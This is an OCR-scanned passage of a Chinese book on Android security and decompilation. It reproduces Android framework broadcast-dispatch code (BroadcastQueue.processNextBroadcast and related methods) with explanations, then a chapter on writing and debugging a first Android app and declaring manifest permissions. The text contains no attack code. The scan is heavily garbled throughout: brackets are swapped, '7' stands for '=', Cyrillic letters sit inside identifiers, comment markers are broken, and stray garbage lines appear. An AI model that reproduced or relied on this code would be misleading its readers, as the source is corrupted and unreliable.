Slog.e(TAG, "App already has crash dialog: " + proc); 
if (res != null) ( 
res.set(0); 
) 
return; 
} 
if (lshowBackground && UserHandle.getAppld(proc.uid) 
>= Process.FIRST APPLICATION UID && proc.userld != mCurrentUserld 
&& proc.pid != MY. PID) ( 
Slog.w(TAG, "Skipping crash dialog of " * proc * ": background"); 
if (res != null) ( 
res.set(0); 


return; 

) 

if (mShowDialogs && !mSleeping && !mShuttingDown) ( 
Dialog d = new AppErrorDialog(mContext, 

ActivityManagerService.this, res, proc); 

d.show(); 
proc.crashDialog 7 d; 

)else ( 
ll The device is asleep, so just pretend that the user 
ll saw a crash dialog and hit "force quit". 


#98 anid enande ata ОООО 


if (res != null) { 
res.set(0); 
} 
} 
} 
ensureBootCompleted(); 
} break; 


case BROADCAST INTENT MSG: { 


// 调 用 函数 processNextBroadcast() 来 处 理 下 一 个 未 处 理 的 广播 
processNextBroadcast(true); 
} break; 


} 
} 
} 

在 上 述 代 码 中 ， 调 用 类 ActivityManagerService 中 的 函数 processNextBroadcast() 来 处 理 下 一 个 未 处 理 的 
广播 。 函 数 processNextBroadcast() 在 文件 frameworks/base/services/java/com/android/server/am/BroadcastQueue.java 
中 定义 ， 有 具体 的 实现 代码 如 下 所 示 。 

final void processNextBroadcast(boolean fromMsg) ( 
synchronized(mService) ( 
BroadcastRecord r; 


if(DEBUG BROADCAST) Slog.v(TAG, "processNextBroadcast [" 
+ mQueueName + "J: " 
+ mParallelBroadcasts.size() + " broadcasts, " 
+ mOrderedBroadcasts.size() + " ordered broadcasts"); 


mService.updateCpuStats(); 


if (fromMsg) { 
mBroadcastsScheduled = false; 


} 


// First, deliver any non-serialized broadcasts right away 
while (mParallelBroadcasts.size() > 0) { 
r = mParallelBroadcasts.remove(0); 
r.dispatchTime = SystemClock.uptimeMillis(); 
r.dispatchClockTime = System.currentTimeMillis(); 
final int N = r.receivers.size(); 
if (DEBUG_BROADCAST_LIGHT) Slog.v(TAG, "Processing parallel broadcast [" 
+ mQueueName + "]" + r); 
for (int i=0; i<N; i++) ( 
Object target = r.receivers.get(i); 
if (DEBUG BROADCAST) Slog.v(TAG, 
"Delivering non-ordered on [" + mQueueName + "] to registered " 
+ target + ":" + г); 
deliverToRegisteredReceiverLocked(r, (BroadcastFilter)target, false); 


305 


В. 系统 安全 和 反 编译 实 必 


addBroadcastToHistoryLocked(r); 
if(DEBUG BROADCAST LIGHT) Slog.v(TAG, "Done with parallel broadcast [" 
+ mQueueName + "] " + r); 


} 
II Now take care of the next serialized one... 


1 If we are waiting for a process to come up to handle the next 
// broadcast, then do nothing at this point. Just in case, we 
// check that the process we're waiting for still exists 
if (mPendingBroadcast != null) { 
if (DEBUG BROADCAST LIGHT) { 
Slog.v(TAG, "processNextBroadcast [" 
+ mQueueName + "]: waiting for " 
+ mPendingBroadcast.curApp); 
} 


boolean isDead; 
synchronized (mService.mPidsSelfLocked){ 
isDead = (mService.mPidsSelfLocked.get( 
mPendingBroadcast.curApp.pid) == null); 


} 
if (lisDead) ( 
// It's still alive, so keep waiting 
return; 
)else( 
Slog.w(TAG, "pending app [" 
+ mQueueName + "]" + mPendingBroadcast.curApp 
+" died before responding to broadcast"); 
mPendingBroadcast.state = BroadcastRecord.IDLE; 
mPendingBroadcast.nextReceiver = mPendingBroadcastRecvIndex; 
mPendingBroadcast = null; 
} 


} 
boolean looped = false; 


do( 
if (mOrderedBroadcasts.size() == 0) ( 
11 No more broadcasts pending, so all done! 
mService.scheduleAppGcsLocked(); 
if (looped) ( 
1 If we had finished the last ordered broadcast, then 
// make sure all processes have correct oom and sched 


// adjustments. 
mService.updateOomAdjLocked(); 
) 
return; 


) 
r = mOrderedBroadcasts.get(0); 
boolean forceReceive = false; 


e. 
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// Ensure that even if something goes awry with the timeout 
// detection, we catch "hung" broadcasts here, discard them, 
// and continue to make progress 
II 
11 This is only done if the system is ready so that РКЕ BOOT COMPLETED 
// receivers don't get executed with timeouts. They're intended for 
// one time heavy lifting after system upgrades and can take 
II significant amounts of time 
int numReceivers = (r.receivers != null) ? r.receivers.size() : 0; 
if (mService.mProcessesReady && r.dispatchTime > 0) ( 
long now 7 SystemClock.uptimeMillis(); 
if ((numReceivers > 0) && 
(now > r.dispatchTime + (2*mTimeoutPeriod*numReceivers))) ( 
Slog.w(TAG, "Hung broadcast [" 
+ mQueueName + "] discarded after timeout failure:" 
*" now=" + now 
+" dispatchTime=" + r.dispatchTime 
+" startTime-" + r.receiverTime 
+" intent=" + r.intent 
+" numReceivers=" + numReceivers 
+" nextReceiver=" + r.nextReceiver 
+" state-" + r.state); 
broadcastTimeoutLocked(false); // forcibly finish this broadcast 
forceReceive = true; 
r.state = BroadcastRecord.IDLE; 


) 


if (r.state != BroadcastRecord.IDLE) ( 
if(DEBUG BROADCAST) Slog.d(TAG, 
"processNextBroadcast(" 
+ mQueueName + ") called when not idle (state=" 
+ r.state + ")"); 
return; 


) 


if (r.receivers == null || r.nextReceiver >= numReceivers 
|| r.resultAbort || forceReceive) ( 
11 No more receivers for this broadcast! Send the final 


ll result if requested... 
if (r.resultTo != null) ( 
try{ 


if (DEBUG BROADCAST) ( 
int seq = r.intent.getIntExtra("seq", -1); 
Slog.i(TAG, "Finishing broadcast [" 
+ mQueueName + "] " + r.intent.getAction() 
+" seq-" + seq + " app=" + r.callerApp); 
} 
performReceiveLocked(r.callerApp, r.resultTo, 
new Intent(r.intent), r.resultCode, 
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r.resultData, r.resultExtras, false, false, r.userld); 
11 Set this to null so that the reference 
Il (local and remote) isnt kept in the mBroadcastHistory 
r.resultTo = null; 
} catch (RemoteException e) { 
Slog.w(TAG, "Failure [" 
+ mQueueName + "] sending broadcast result of " 
+ rintent, e); 


H 


if(DEBUG BROADCAST) Slog.v(TAG, "Cancelling BROADCAST TIMEOUT MSG"); 
cancelBroadcastTimeoutLocked(); 


if(DEBUG BROADCAST LIGHT) Slog.v(TAG, "Finished with ordered broadcast " 
+r); 


// ... and on to the next... 
addBroadcastToHistoryLocked(r); 
mOrderedBroadcasts.remove(0); 
r = null; 
looped = true; 
continue; 

} 


} while (r == null); 


11 Get the next receiver... 
int recldx = r.nextReceiver++; 


11 Keep track of when this receiver started, and make sure there 
II is a timeout message pending to kill it if need be 
r.receiverTime = SystemClock.uptimeMillis(); 
if (recldx == 0) ( 
r.dispatchTime = r.receiverTime; 
r.dispatchClockTime = System.currentTimeMillis(); 
if(DEBUG BROADCAST LIGHT) Slog.v(TAG, "Processing ordered broadcast [" 
+ mQueueName + "]" + r); 
) 
if (! mPendingBroadcastTimeoutMessage) ( 
long timeoutTime = r.receiverTime + mTimeoutPeriod; 
if(DEBUG BROADCAST) Slog.v(TAG, 
"Submitting BROADCAST TIMEOUT MSG [" 
+ mQueueName + "] for" + r +" at" + timeoutTime); 
setBroadcastTimeoutLocked(timeoutTime); 
) 


Object nextReceiver = r.receivers.get(recldx); 

if (nextReceiver instanceof BroadcastFilter) ( 
11 Simple case: this is a registered receiver who gets 
ll a direct call 
BroadcastFilter filter = (BroadcastFilter)nextReceiver; 
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if (DEBUG BROADCAST) Slog.v(TAG, 

"Delivering ordered [" 

+ mQueueName + "] to registered" 

+ filter + ": " + r); 
deliverToRegisteredReceiverLocked(r, filter, r.ordered); 
if (r.receiver == null || !r.ordered) { 

11 The receiver has already finished, so schedule to 
ll process the next one 
if(DEBUG BROADCAST) Slog.v(TAG, "Quick finishing [" 

+ mQueueName + "]: ordered-" 

+ r.ordered +" receiver=" + r.receiver); 
r.state = BroadcastRecord.IDLE; 
scheduleBroadcastsLocked(); 

} 
return; 


5 


11 Hard case: need to instantiate the receiver, possibly 
// starting its application process to host it 


Resolvelnfo info = 
(Resolvelnfo)nextReceiver; 
ComponentName component = new ComponentName( 
info.activityInfo.applicationInfo.packageName, 
info.activityInfo.name); 


boolean skip = false; 
int perm = mService.checkComponentPermission(info.activityInfo.permission, 
r.callingPid, r.callingUid, info.activityInfo.applicationInfo.uid, 
info.activityInfo.exported); 
if (perm != PackageManager.PERMISSION GRANTED) ( 
if (linfo.activityInfo.exported) ( 
Slog.w(TAG, "Permission Denial: broadcasting " 
+ rintent.toString() 
+" from " + r.callerPackage + " (pid=" + r.callingPid 
+", uid=" + r.callingUid + ")" 
+" is not exported from uid " + info.activityInfo.applicationInfo.uid 
+" due to receiver " + component.flattenToShortString()); 
)else ( 
Slog.w(TAG, "Permission Denial: broadcasting " 
+ r.intent.toString() 
+" from" + r.callerPackage + " (pid=" + r.callingPid 
+", uid=" + r.callingUid + ")" 
+ " requires " + info.activityInfo.permission 
+" due to receiver " + component.flattenToShortString()); 
} 
5Кїр = true; 
} 
if (info.activityInfo.applicationInfo.uid != Process.SYSTEM UID && 
r.requiredPermission !- null) ( 


try( 
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perm = AppGlobals.getPackageManager(). 
checkPermission(r.requiredPermission, 
info.activityInfo.applicationInfo.packageName); 
) catch (RemoteException e) ( 
perm = PackageManager.PERMISSION DENIED; 
H 
if (perm != PackageManager.PERMISSION GRANTED) ( 
Slog.w(TAG, "Permission Denial: receiving " 
+ rintent + " to " 
+ component.flattenToShortString() 
*" requires " * r.requiredPermission 
+" due to sender " + r.callerPackage 
+" (uid " + r.callingUid + ")"); 
skip 7 true; 
} 
} 
if (rappOp != AppOpsManager.OP_NONE) { 
int mode = mService.mAppOpsService.checkOperation(r.appOp, 
info.activityInfo.applicationInfo.uid, info.activityInfo.packageName); 
if (mode != AppOpsManager. MODE ALLOWED)( 
if (DEBUG BROADCAST) Slog.v(TAG, 
"App op "+ r.appOp +" not allowed for broadcast to ша" 
+ info.activityInfo.applicationInfo.uid + " pkg" 
+ info.activityInfo.packageName); 


skip = true; 
} 
} 
boolean isSingleton = false; 
try { 
isSingleton = mService.isSingleton(info.activityInfo.processName, 
info.activityInfo.applicationInfo, 
info.activityInfo.name, info.activityInfo.flags ); 
} catch (SecurityException e) ( 
Slog.w(TAG, e.getMessage()); 
Skip 7 true; 
) 


if ((info.activityInfo.flags&ActivityInfo.FLAG SINGLE USER) != 0) ( 
if (ActivityManager.checkUidPermission( 
android.Manifest.permission.|INTERACT ACROSS USERS, 
info.activityInfo.applicationInfo.uid) 
!= PackageManager.PERMISSION GRANTED) ( 
Slog.w(TAG, "Permission Denial: Receiver " + component.flattenToShortString() 
+" requests FLAG SINGLE USER, but app does not hold " 
+ android.Manifest.permission.|:INTERACT ACROSS USERS); 
Skip 7 true; 
} 
} 
if (r.curApp != null && r.curApp.crashing) { 
// \f the target process is crashing, just skip it. 
if(DEBUG BROADCAST) Slog.v(TAG, 
"Skipping deliver ordered [" 
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+ mQueueName + "]" + r + " to" + r.curApp 
+": process crashing"); 
skip = true; 
} 


if (skip) ( 
if (DEBUG BROADCAST) Slog.v(TAG, 
"Skipping delivery of ordered [" 
+ mQueueName + "| " + r+" for whatever reason"); 
r.receiver = null; 
r.curFilter = null; 
r.state = BroadcastRecord.IDLE; 
scheduleBroadcastsLocked(); 
return; 


) 


r.state = BroadcastRecord.APP RECEIVE; 
String targetProcess = info.activityInfo.processName; 
r.curComponent = component; 
if (r.callingUid != Process.SYSTEM_UID && isSingleton) ( 
info.activitylnfo = mService.getActivityInfoForUser(info.activityInfo, 0); 
} 
r.curReceiver = info.activityInfo; 
if (DEBUG MU 88 r.callingUid > UserHandle.PER USER RANGE) { 
Slog.v(TAG MU, "Updated broadcast record activity info for secondary user, " 
+ info.activityInfo + ", callingUid = " + r.callingUid + ", uid =" 
+ info.activityInfo.applicationInfo.uid); 
} 


11 Broadcast is being executed, its package can't be stopped 
try{ 
AppGlobals.getPackageManager().setPackageStoppedState( 
r.curComponent.getPackageName(), false, UserHandle.getUserld(r.callingUid)); 
) catch (RemoteException e) ( 
} catch (IllegalargumentException e) { 
Slog.w(TAG, "Failed trying to unstop package " 
+ r.curComponent.getPackageName() + ": " + e); 


) 


11 15 this receiver's application already running 
ProcessRecord app 7 mService.getProcessRecordLocked(targetProcess, 
info.activityInfo.applicationInfo.uid); 
if (app != null && app.thread !- null) ( 
try ( 
app.addPackage(info.activityInfo.packageName); 
processCurBroadcastLocked(r, app); 
return; 
) catch (RemoteException e) ( 
Slog.w(TAG, "Exception when sending broadcast to " 
+ r.curComponent, e); 
) catch (RuntimeException e) ( 
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Log.wtf(TAG, "Failed sending broadcast to " 
+ r.curComponent + " with " + r.intent, e); 
11 If some unexpected exception happened, just skip 
1 this broadcast. At this point we are not in the call 
И from a client, so throwing an exception out from here 
// will crash the entire system instead of just whoever 
ll sent the broadcast 
logBroadcastReceiverDiscardLocked(r); 
finishReceiverLocked(r, r.resultCode, r.resultData, 
r.resultExtras, r.resultAbort, true); 
scheduleBroadcastsLocked(); 
11 We need to reset the state if we failed to start the receiver 
r.state = BroadcastRecord.IDLE; 
return; 


) 


11 !f a dead object exception was thrown — fall through to 
// restart the application 
} 


11 Not running -- get it started, to be executed when the app comes up 
if (DEBUG BROADCAST) Slog.v(TAG, 
"Need to start app [" 
+ mQueueName + "] " + targetProcess +" for broadcast " + г); 
if ((r.curApp=mService.startProcessLocked(targetProcess, 
info.activityInfo.applicationInfo, true, 
rintent.getFlags() | IntenL.FLAG FROM BACKGROUND, 
"broadcast", r.curComponent, 
(rintent.getFlags()&Intent.FLAG RECEIVER BOOT. UPGRADE) != 0, false)) 
== null) ( 
ll Ah, this recipient is unavailable. Finish it if necessary, 
/ll and mark the broadcast record as ready for the next 
Slog.w(TAG, "Unable to launch app " 
+ info.activityInfo.applicationInfo.packageName + "/" 
+ info.activityInfo.applicationInfo.uid + " for broadcast" 
+ rintent + ": process is bad"); 
logBroadcastReceiverDiscardLocked(r); 
finishReceiverLocked(r, r.resultCode, r.resultData, 
r.resultExtras, r.resultAbort, true); 
scheduleBroadcastsLocked(); 
r.state = BroadcastRecord.IDLE; 
return; 


} 


mPendingBroadcast = r; 
mPendingBroadcastRecvindex = recldx; 
} 
) 
函数 processNextBroadcast() 的 具体 实现 流程 如 下 所 示 。 
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(1) 判断 fomMsg， 如 果 是 通过 消息 发 送 过 来 的 就 为 真 ， 否 则 为 假 ; 如 果 为 真 ，mBroadcastsScheduled = 
false， 则 函数 scheduleBroadcastsLocked0 中 就 可 以 再 次 发 送 BROADCAST. INTENT MSG 的 消息 ,从 而 触发 
processNextBroadcast(O) 函 数 被 再 次 调用 。 

(2) 判断 mParallelBroadcasts 是 否 为 空 ， 不 为 空 就 开始 调用 这 个 列表 中 的 receivers 来 接收 消息 ， 这 个 
过 程 在 后 面 串 行 intent 时 也 会 磁 到 ， 留 到 后 面 讨论 ， 这 里 只 需要 知道 它 通过 一 个 while 循环 把 Intent 发 送 给 
关注 这 个 Intent 的 所 有 的 receivers。 

(3) 判断 mPendingBroadcast 是 否 为 空 , 如 果 不 为 空 , 就 表示 先前 发 送 的 串 行 的 Intent Ж АЕН 5с 9 

- 般 出 现 这 种 可 能 是 因为 要 发 送 到 的 receiver 还 没有 启动 ， 所 以 需要 先 启动 这 个 activity， 然 后 等 待 这 个 
Activity 处 理 ， 这 时 ，mPendingBroadcast 就 为 tue; 如 果 发 送 这 种 情况 ， 需 要 判断 这 个 Activity 是 否 死 了 ， 
如 果 死 了 ， 那 么 就 把 mPendingBroadcast 设 为 false， 和 否则 直接 返回 ， 继 续 等 待 。 

(4) 顺序 从 mOrderedBroadcasts 中 取出 BroadCastRecord 消息 ， 然 后 对 这 个 消息 的 receiver 逐个 的 调用 
其 接收 流程 。 在 处 理 这 个 消息 的 过 程 中 ， 先 判断 其 接收 者 是 不 是 BroadCastFilter， 如 果 是 则 调用 deliver- 
ToRegisteredReceiver 来 接收 。 

(5) 如 果 不 是 BroadCastFilter， 则 需要 找 出 这 个 receiver 所 在 的 进程 ， 这 时 通常 是 一 个 IntentFilter 所 在 
的 进程 。 如 果 这 个 进程 活着 , 则 调用 processCurBroadcastLocked(r, app) 来 处 理 , 否则 需要 用 startProcessLocked 
先 启 动 这 个 进程 ， 然 后 设置 mPendingBroadcast = r， 这 样 等 应 用 起 来 会 处 理 这 个 消息 。 


9.6.8 ”检查 权限 


在 文件 frameworks/base/services/java/com/android/server/am/BroadcastQueue.java 中 ， 通 过 函数 deliver- 
ToRegisteredReceiverLocked() 检 查 广 播发 送 和 接收 的 权限 ,然后 调用 函数 performReceiveLocked() 进 一 步 执行 
广播 发 送 的 操作 。 函 数 deliverToRegisteredReceiverLocked0) 的 具体 实现 代码 如 下 所 示 。 

private final void deliverToRegisteredReceiverLocked(BroadcastRecord r, 

BroadcastFilter filter, boolean ordered) ( 
boolean skip = false; 
if (filter.requiredPermission != null) { 
int perm = mService.checkComponentPermission(filter.requiredPermission, 
r.callingPid, r.callingUid, -1, true); 
if (perm != PackageManager.PERMISSION GRANTED) { 
Slog.w(TAG, "Permission Denial: broadcasting " 
+ rintent.toString() 
+" from " + r.callerPackage + " (pid=" 
+ r.callingPid +", uid=" + r.callingUid + ")" 
+" requires " + filter.requiredPermission 
+" due to registered receiver " + filter); 
skip = true; 
} 


if (Iskip && r.requiredPermission != null) { 
int perm = mService.checkComponentPermission(r.requiredPermission, 
filter.receiverList.pid, filter.receiverList.uid, -1, true); 
if (perm != PackageManager.PERMISSION GRANTED) { 
Slog.w(TAG, "Permission Denial: receiving " 

+ rintent.toString() 
+" to " + filter.receiverList.app 
+" (pid=" + filter.receiverList.pid 
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+", uid=" + filter.receiverList.uid + ")" 
+" requires " + r.requiredPermission 
+" due to sender " + r.callerPackage 
+" (uid " + r.callingUid + ")"); 
skip = true; 
H 
} 
if (r.appOp != AppOpsManager.OP NONE) ( 
int mode = mService.mAppOpsService.checkOperation(r.appOp, 
filter.receiverList.uid, filter.packageName); 
if (mode != AppOpsManager. MODE ALLOWED) { 
if (DEBUG BROADCAST) Slog.v(TAG, 
"App op "+ r.appOp +" not allowed for broadcast to ша" 
+ filter.receiverList.uid + " pkg " + filter.packageName); 
Skip 7 true; 


) 


if (Iskip) ( 
// \f this is not being sent as an ordered broadcast, then we 
// don't want to touch the fields that keep track of the current 
11 state of ordered broadcasts 
if (ordered) ( 
r.receiver = filter.receiverList.receiver.asBinder(); 
r.curFilter = filter; 
filter.receiverList.curBroadcast = r; 
r.state = BroadcastRecord.CALL IN RECEIVE; 
if (filter.receiverList.app != null) ( 
// Bump hosting application to no longer be in background 
ll scheduling class. Note that we can't do that if there 
ll isn't an app... but we can only be in that case for 
// things that directly call the lActivityManager API, which 
11 are already core system stuff so don't matter for this 
r.curApp - filter.receiverList.app; 
filter.receiverList.app.curReceiver = r; 


mService.updateOomAdjLocked(); 
) 
b 
try{ 
if(DEBUG BROADCAST LIGHT) ( 
int seq = r.intent.getIntExtra("seq", -1); 
Slog.i(TAG, "Delivering to " + filter 
+" (seq=" + seq + "): " + r); 
h 
performReceiveLocked(filter.receiverList.app, filter.receiverList.receiver, 
new Intent(r.intent), r.resultCode, r.resultData, 
r.resultExtras, r.ordered, r.initialSticky, r.userld); 
if (ordered) ( 
r.state - BroadcastRecord.CALL DONE RECEIVE; 
} 
) catch (RemoteException e) ( 
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Slog.w(TAG, "Failure sending broadcast " + r.intent, e); 
if (ordered) ( 
r.receiver = null; 
r.curFilter = null; 
filter.receiverList.curBroadcast = null; 
if (filter.receiverList.app != null) ( 
filter.receiverList.app.curReceiver = null; 


} 


} 
} 
再 看 函数 performReceiveLocked(), ， 此 函数 在 文件 frameworks/base/services/java/com/android/server/ 
am/BroadcastQueue.java 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
private static void performReceiveLocked(ProcessRecord app, lIntentReceiver receiver, 
Intent intent, int resultCode, String data, Bundle extras, 
boolean ordered, boolean sticky, int sendingUser) throws RemoteException ( 
11 Send the intent to the receiver asynchronously using one-way binder calls 
if (app != null && app.thread != null) { 
1 If we have an app thread, do the call through that so it is 
// correctly ordered with other one-way calls 
app.thread.scheduleRegisteredReceiver(receiver, intent, resultCode, 
data, extras, ordered, sticky, sendingUser); 
) else ( 
receiver.performReceive(intent, resultCode, data, extras, ordered, 
Sticky, sendingUser); 
) 
} 
各 个 参数 的 具体 说 明 如 下 。 
口 app: 表示 注册 广播 接收 器 的 Activity 所 在 的 进程 记录 块 。 
O receiver: 指向 一 个 实现 了 IIntentReceiver 接 口 的 Binder 代 理 对 象 ， 表 示 目 标 广 播 接收 者 。 
О intent， 表 示 即 将 要 发 送 给 目标 广播 接收 者 的 一 个 广播 。 
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编写 安全 的 应 用 程序 

APK 的 自我 保护 机 制 

常用 的 反 编 译 工具 

dex2jar, jdgui.exe 和 Apktool 工具 反 编 译 实战 
IDA Pro 实战 一 一 反 编译 和 脱党 

反 编 译 实 战 一 一 Smali 文件 分 析 


ARM 汇编 送 向 分 析 

加 过 技术 详解 
< 

动态 分 析 和 调试 RS С ) 

常见 病毒 分 析 ! ° 

常见 漏洞 分 析 | 


BIOS WSUS Hwy 


在 本 章 的 内 容 中 ， 将 详细 讲解 构建 一 个 安全 的 Android 应 用 程序 的 知识 。 首 先 详细 讲解 使 用 Eclipse FF 
发 并 调试 Android 应 用 程序 的 过 程 和 发 布 Android 应 用 程序 的 方法 ， 然 后 讲解 编译 和 反 编 译 Android 应 用 程 
序 的 具体 过 程 ; 最 后 详细 讲解 构建 各 种 Android 应 用 组 件 的 基本 知识 。 希 望 通过 本 章 内 容 的 学 习 ， 为 读者 学 
习 本 书后 面 的 知识 打下 基础 。 


10.1 开发 第 一 个 Android 应 用 程序 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 10 章 \ 开 发 第 一 个 Android 应 用 程序 .avi 
本 实例 的 功能 是 在 手机 屏幕 中 显示 问候 语 “ 你 好 我 的 朋友 ! ”， 在 具体 开始 之 前 先 做 一 个 简单 的 流程 
规划 ， 如 图 10-1 所 示 。 


Java 代 码 Debug 调 试 


m 


用 Eclipse —9 新 建 工程 | 一 ;| 编写 代码 — 调试 项 目 — 运行 项 目 


断 点 调试 


图 10-1 规划 流程 图 


i 在 手机 屏幕 中 显示 问候 语 
在 接 下 来 的 内 容 中 ， 将 详细 讲解 本 实例 的 具体 实现 流程 。 


10.1.1 新 建 Android 工程 


(1) 在 Eclipse 中 依次 选择 File | New | Project 命令 新 建 一 个 工程 文件 ， 如 图 10-2 所 示 。 
(2) 选择 Android Project 选项 后 单 击 Next 按钮 ， 在 弹出 的 New Android Project 对 话 框 中 设置 工程 信息 ， 
如 图 10-3 所 示 。 
在 图 10-3 所 示 的 界面 中 依次 设置 工程 名 、 包 名 、Activity 名 和 应 用 名 。 
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E Wer Project [.]o]x] 
Select a wizard 
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Compile tk o [WT 19: Android 44 
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reach approrinately 95 of the merket. 
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图 10-2 ”新 建 工程 文件 图 10-3 设置 工程 


10.1.2 ”编写 代码 和 代码 分 析 


现在 已 经 创建 了 一 个 名 为 first 的 工程 文件 ， 打 开 文 件 firstjava， 会 显示 如 下 自动 生成 的 代码 。 
package first.a; 
import android.app.Activity; 
import android.os.Bundle; 
public class fistMM extends Activity ( 
/** Called when the activity is first created */ 
@Override 
public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedinstanceState); 
setContentView(R.layout.main); 
} 
} 
如 果 此 时 运行 程序 ， 将 不 会 显示 任何 东西 。 此 时 我 们 可 以 对 上 述 代 码 进行 稍微 的 修改 ， 让 程序 输出 
HelloWorld， 具 体 代码 如 下 所 示 。 
package first.a; 
import android.app.Activity; 
import android.os.Bundle; 
import android.widget.TextView; 


public class fistMM extends Activity ( 

/** Called when the activity is first created */ 

@Override 

public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedinstanceState); 
setContentView(R.layout.main); 
TextView tv = new TextView(this); 
tv.setText(" 你 好 我 的 朋友 ! "); 
setContentView(tv); 
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} 
} 
经 过 上 述 代 码 改写 后 ， 可 以 在 屏幕 中 输出 “你 好 我 的 朋友 ! ”， 完 全 符合 预期 的 要 求 。 


10.1.3 调试 


Android 调试 一 般 分 为 3 个 步骤 ， 分 别 是 设置 断 点 、Debusg 调试 和 断 点 调试 。 

(1) 设置 断 点 

在 使 用 Eclipse JF Android 应 用 程序 的 过 程 中 ， 设 置 断 点 的 方法 和 在 Java 中 的 设置 方法 一 样 ， 可 以 通 
过 双击 代码 左边 的 区 域 方式 实现 ， 如 图 10-4 所 示 。 

为 了 调试 方便 ， 可 以 设置 显示 代码 的 行 数 。 只 需 在 代码 左 侧 的 空白 部 分 右 击 ， 在 弹出 的 快捷 菜单 中 选 
择 Show Line Numbers， 如 图 10-5 所 示 。 


图 10-4 设置 断 点 10-5 ERTA 


(2) Debug 调试 
Debug Android 调试 项 目的 方法 和 普通 Debug Java 调试 项 目的 方法 类 似 , 唯一 的 不 同 是 在 选择 调试 项 目 
时 选择 Android Application 命令 .具体 方法 是 右 击 项 目 名 , 在 弹出 的 快捷 菜单 中 依次 选择 Debug As | Android 
Application 命令 ， 如 图 10-6 所 示 。 


图 10-6 Debug 项 目 


zos &SeeOEBHE О 
(GO 断 点 调试 


可 以 进行 单 步调 试 ， 具 体 调试 方法 和 调试 普通 Java 程序 的 方法 类 似 ， 调 试 界面 如 图 10-7 所 示 。 
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图 10-7 调试 界面 


10.1.4 ”运行 项 目 


将 上 述 代码 保存 后 即 可 运行 这 段 程 序 了 ， 具 体 运行 过 程 如 下 。 
(1) 右 击 项 目 名 ， 在 弹出 的 快捷 菜单 中 依次 选择 Run As | Android Application 命令 ， 如 图 10-8 所 示 。 


„Activity; 
.o5.Burdle: 
|. vidget.Text Views 


Astim extends Activity í 
when the activity 13 first created. */ 


d onCreate |Bundle sevedInstanceState| ( 


Text ("belloWorld"); 
itenzView (tv); 


38 — first] Scarting activity first.a.fistNN 
irst] ActivityNanager: Starting: Intent 


10-8 ”开始 调试 
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(2) 此 时 工程 开始 运行 ， 运 行 完 成 后 将 在 屏幕 中 输出 “你 好 我 的 朋友 ! ”， 如 图 10-9 所 示 。 
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图 10-9 运行 结果 
102 声明 不 同 的 权限 


GF 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 10 章 \ 声 明 不 同 的 权限 .avi 

在 Android 系统 中 , 每 个 应 用 程序 的 APK (Android Package) 包 中 都 会 包含 有 一 个 AndroidManifest.xml 
文件 ， 该 文件 除了 罗列 应 用 程序 运行 时 库 、 运 行 依赖 关系 等 之 外 ， 还 会 详细 地 罗列 出 该 应 用 程序 所 需 的 系 
统 访问 。AndroidManifest.xml 文件 是 一 个 与 安全 相关 的 配置 文件 ,该 配置 文件 是 Android 安全 保障 的 一 个 不 
可 忽视 的 方面 。 在 本 节 的 内 容 中 ， 将 详细 讲解 使 用 AndroidManifest.xml 文件 声明 不 同 权限 的 基本 知识 。 


10.2.1 AndroidManifest.xml 文件 基础 


在 Android 系统 中 ，AndroidManifest.xml 文件 的 主要 功能 如 下 所 示 。 
说 明 程序 用 到 的 Java 数据 包 ， 数 据 包 名 是 应 用 程序 的 唯一 标识 。 
描述 应 用 程序 的 具体 组 成 部 分 。 
说 明 应 用 程序 的 各 个 组 成 部 分 在 哪个 进程 下 运行 。 
声明 应 用 程序 所 必须 具备 的 权限 ， 以 访问 受 保护 的 部 分 API 以 及 与 其 他 应 用 程序 进行 交互 。 
声明 应 用 程序 其 他 的 必 备 权限 ， 以 实现 各 个 组 成 部 分 之 间 的 交互 。 
列举 应 用 程序 运行 时 需要 的 环境 配置 信息 ， 只 在 程序 开发 和 测试 时 声明 这 些 信 息 ， 在 发 布 前 会 
ABR 
Q 声明 应 用 程序 所 需要 的 Android API 的 最 低 版 本 ， 例 如 1.0、1.5 和 1.6 等 。 
口 列举 应 用 程序 所 需要 链接 的 库 。 
在 Android 系统 中 ， 可 在 Android SDK 的 帮助 文档 中 查看 AndroidManifest.xml 文件 的 结构 、 元 素 以 及 
元 素 属性 的 具体 说 明 ， 这 些 元 素 在 命名 、 结 构 等 方面 的 使 用 规则 如 下 。 
О жж: 在 所 有 元 素 中 ， 只 有 <manifest> 和 <application> 是 必需 的 ， 且 只 能 出 现 一 次 。 如 果 一 个 元 素 
包含 有 其 他 子 元 素 ， 必 须 通过 子 元 素 的 属性 来 设置 其 值 。 处 于 同一 层次 的 元 素 ， 其 说 明 是 没有 顺 
O 属性 : 通常 所 有 的 属性 都 是 可 选 的 ， 但 是 有 些 属性 是 必须 设置 的 ， 即 使 不 存在 ， 那 些 真正 可 选 的 属 
性 也 有 默认 的 数值 项 说 明 。 除 了 根 元 素 <manifest> 的 属性 ， 所 有 其 他 元 素 属性 的 名 字 都 是 以 android: 
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oooooo 


sos eseconmes — — 


о 定义 类 名 : 所 有 的 元 素 名 都 对 应 其 在 SDK 中 的 类 名 ， 如 果 自 己 定义 类 名 ， 必 须 包 含 类 的 数据 包 名 ， 
如 果 类 与 application 处 于 同一 数据 包 中 ， 可 以 直接 简写 为 “.”。 

O 多 数值 项 : 如 果 某 个 元 素 有 超过 一 个 的 数值 , 那么 这 个 元 素 必 须 通过 重复 的 方式 来 说 明 其 某 个 属性 
具有 多 个 数值 项 ， 且 不 能 将 多 个 数值 项 一 次 性 说 明 在 一 个 属性 中 。 

О ”资源 项 说 明 : 当 需 要 引用 某 个 资源 时 ， 其 采用 如 下 格式 : @[package:]type:name.. fil] 1, <activity 
android:icon="(@drawable/icon"...>。 


О 字符 串 值 ， 类 似 于 其 他 语言 ， 如 果 字 符 中 包含 有 字符 “\”， 则 必须 使 用 转 义 字符 “\\”。 
10.2.2 ”声明 获取 不 同 的 权限 


AndroidManifest.xml 文件 的 基本 格式 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
«manifest xmlns:android="http://schemas.android.com/apk/res/android" 
package="cn.com.fetion.android" 
android:versionCode="1" 
android:versionName="1.0.0"> 
«application android:icon="@drawable/icon" android:label="@string/app_name"> 
<activity android:name=".welcomAcmtivity" 
android:label="@string/app_name"> 
<intent-filter> 
